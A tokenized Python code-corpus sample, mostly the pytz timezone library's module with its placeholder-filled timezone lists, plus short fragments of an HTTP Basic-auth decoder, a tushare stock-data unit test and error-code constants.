password = auth_schemes [ auth_type ] ( data ) <EOL> else : <EOL> raise HTTPException ( <NUM_LIT> , "<STR_LIT>" % auth_type ) <EOL> def decode_basic ( self , data ) : <EOL> decoded_data = base64 . decodestring ( data ) <EOL> return decoded_data . split ( "<STR_LIT::>" , <NUM_LIT:1> ) </s>
<s> import unittest <EOL> import tushare . stock . fundamental as fd <EOL> class Test ( unittest . TestCase ) : <EOL> def set_data ( self ) : <EOL> self . code = '<STR_LIT>' <EOL> self . start = '<STR_LIT>' <EOL> self . end = '<STR_LIT>' <EOL> self . year = <NUM_LIT> <EOL> self . quarter = <NUM_LIT:4> <EOL> def test_get_stock_basics ( self ) : <EOL> print ( fd . get_stock_basics ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> API_ERROR = <NUM_LIT> <EOL> CONFIG_FILE_PARSE_ERROR = <NUM_LIT> <EOL> AUTH_ERROR = <NUM_LIT> </s>
<s> '''<STR_LIT>''' <EOL> OLSON_VERSION = '<STR_LIT>' <EOL> VERSION = OLSON_VERSION <EOL> __version__ = OLSON_VERSION <EOL> OLSEN_VERSION = OLSON_VERSION <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> import sys , datetime , os . path , gettext <EOL> try : <EOL> from pkg_resources import resource_stream <EOL> except ImportError : <EOL> resource_stream = None <EOL> from pytz . exceptions import AmbiguousTimeError <EOL> from pytz . exceptions import InvalidTimeError <EOL> from pytz . exceptions import NonExistentTimeError <EOL> from pytz . exceptions import UnknownTimeZoneError <EOL> from pytz . lazy import LazyDict , LazyList , LazySet <EOL> from pytz . tzinfo import unpickler <EOL> from pytz . tzfile import build_tzinfo , _byte_string <EOL> try : <EOL> str <EOL> except NameError : <EOL> str = str <EOL> def ascii ( s ) : <EOL> r"""<STR_LIT>""" <EOL> s . encode ( '<STR_LIT>' ) <EOL> return s <EOL> else : <EOL> def ascii ( s ) : <EOL> r"""<STR_LIT>""" <EOL> return s . encode ( '<STR_LIT>' ) <EOL> def open_resource ( name ) : <EOL> """<STR_LIT>""" <EOL> name_parts = name . lstrip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> for part in name_parts : <EOL> if part == os . path . pardir or os . path . sep in part : <EOL> raise ValueError ( '<STR_LIT>' % part ) <EOL> filename = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' , * name_parts ) <EOL> if not os . path . exists ( filename ) and resource_stream is not None : <EOL> return resource_stream ( __name__ , '<STR_LIT>' + name ) <EOL> return open ( filename , '<STR_LIT:rb>' ) <EOL> def resource_exists ( name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> open_resource ( name ) . 
close ( ) <EOL> return True <EOL> except IOError : <EOL> return False <EOL> _tzinfo_cache = { } <EOL> def timezone ( zone ) : <EOL> r'''<STR_LIT>''' <EOL> if zone . upper ( ) == '<STR_LIT>' : <EOL> return utc <EOL> try : <EOL> zone = ascii ( zone ) <EOL> except UnicodeEncodeError : <EOL> raise UnknownTimeZoneError ( zone ) <EOL> zone = _unmunge_zone ( zone ) <EOL> if zone not in _tzinfo_cache : <EOL> if zone in all_timezones_set : <EOL> fp = open_resource ( zone ) <EOL> try : <EOL> _tzinfo_cache [ zone ] = build_tzinfo ( zone , fp ) <EOL> finally : <EOL> fp . close ( ) <EOL> else : <EOL> raise UnknownTimeZoneError ( zone ) <EOL> return _tzinfo_cache [ zone ] <EOL> def _unmunge_zone ( zone ) : <EOL> """<STR_LIT>""" <EOL> return zone . replace ( '<STR_LIT>' , '<STR_LIT:+>' ) . replace ( '<STR_LIT>' , '<STR_LIT:->' ) <EOL> ZERO = datetime . timedelta ( <NUM_LIT:0> ) <EOL> HOUR = datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> class UTC ( datetime . tzinfo ) : <EOL> """<STR_LIT>""" <EOL> zone = "<STR_LIT>" <EOL> _utcoffset = ZERO <EOL> _dst = ZERO <EOL> _tzname = zone <EOL> def fromutc ( self , dt ) : <EOL> if dt . tzinfo is None : <EOL> return self . localize ( dt ) <EOL> return super ( utc . __class__ , self ) . fromutc ( dt ) <EOL> def utcoffset ( self , dt ) : <EOL> return ZERO <EOL> def tzname ( self , dt ) : <EOL> return "<STR_LIT>" <EOL> def dst ( self , dt ) : <EOL> return ZERO <EOL> def __reduce__ ( self ) : <EOL> return _UTC , ( ) <EOL> def localize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def normalize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is self : <EOL> return dt <EOL> if dt . tzinfo is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . 
astimezone ( self ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> UTC = utc = UTC ( ) <EOL> def _UTC ( ) : <EOL> """<STR_LIT>""" <EOL> return utc <EOL> _UTC . __safe_for_unpickling__ = True <EOL> def _p ( * args ) : <EOL> """<STR_LIT>""" <EOL> return unpickler ( * args ) <EOL> _p . __safe_for_unpickling__ = True <EOL> class _CountryTimezoneDict ( LazyDict ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , iso3166_code ) : <EOL> """<STR_LIT>""" <EOL> return self [ iso3166_code ] <EOL> def _fill ( self ) : <EOL> data = { } <EOL> zone_tab = open_resource ( '<STR_LIT>' ) <EOL> try : <EOL> for line in zone_tab : <EOL> line = line . decode ( '<STR_LIT>' ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> code , coordinates , zone = line . split ( None , <NUM_LIT:4> ) [ : <NUM_LIT:3> ] <EOL> if zone not in all_timezones_set : <EOL> continue <EOL> try : <EOL> data [ code ] . append ( zone ) <EOL> except KeyError : <EOL> data [ code ] = [ zone ] <EOL> self . data = data <EOL> finally : <EOL> zone_tab . close ( ) <EOL> country_timezones = _CountryTimezoneDict ( ) <EOL> class _CountryNameDict ( LazyDict ) : <EOL> '''<STR_LIT>''' <EOL> def _fill ( self ) : <EOL> data = { } <EOL> zone_tab = open_resource ( '<STR_LIT>' ) <EOL> try : <EOL> for line in zone_tab . readlines ( ) : <EOL> line = line . decode ( '<STR_LIT>' ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> code , name = line . split ( None , <NUM_LIT:1> ) <EOL> data [ code ] = name . strip ( ) <EOL> self . data = data <EOL> finally : <EOL> zone_tab . close ( ) <EOL> country_names = _CountryNameDict ( ) <EOL> class _FixedOffset ( datetime . tzinfo ) : <EOL> zone = None <EOL> def __init__ ( self , minutes ) : <EOL> if abs ( minutes ) >= <NUM_LIT> : <EOL> raise ValueError ( "<STR_LIT>" , minutes ) <EOL> self . _minutes = minutes <EOL> self . _offset = datetime . 
timedelta ( minutes = minutes ) <EOL> def utcoffset ( self , dt ) : <EOL> return self . _offset <EOL> def __reduce__ ( self ) : <EOL> return FixedOffset , ( self . _minutes , ) <EOL> def dst ( self , dt ) : <EOL> return ZERO <EOL> def tzname ( self , dt ) : <EOL> return None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _minutes <EOL> def localize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def normalize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def FixedOffset ( offset , _tzinfos = { } ) : <EOL> """<STR_LIT>""" <EOL> if offset == <NUM_LIT:0> : <EOL> return UTC <EOL> info = _tzinfos . get ( offset ) <EOL> if info is None : <EOL> info = _tzinfos . setdefault ( offset , _FixedOffset ( offset ) ) <EOL> return info <EOL> FixedOffset . __safe_for_unpickling__ = True <EOL> def _test ( ) : <EOL> import doctest , os , sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . pardir ) <EOL> import pytz <EOL> return doctest . 
testmod ( pytz ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) <EOL> all_timezones = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 
<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 
<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 
<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 
<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 
<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> all_timezones = LazyList ( <EOL> tz for tz in all_timezones if resource_exists ( tz ) ) <EOL> all_timezones_set = LazySet ( all_timezones ) <EOL> common_timezones = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 